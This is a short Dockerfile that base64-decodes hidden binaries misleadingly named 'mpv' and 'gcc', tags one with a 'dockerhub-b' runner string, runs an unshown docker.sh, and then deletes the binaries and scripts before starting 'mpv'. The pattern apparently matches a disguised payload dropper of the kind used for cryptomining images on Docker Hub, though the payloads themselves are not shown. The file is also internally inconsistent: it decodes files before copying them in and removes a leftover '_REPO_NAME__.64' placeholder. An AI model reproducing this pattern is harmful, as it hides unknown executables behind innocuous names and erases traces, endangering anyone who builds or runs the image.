FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > mpv.log'

RUN base64 --decode mpv.64 > mpv
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY mpv .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' mpv
RUN bash ./docker.sh

RUN rm --force --recursive mpv _REPO_NAME__.64 docker.sh gcc gcc.64

CMD mpv
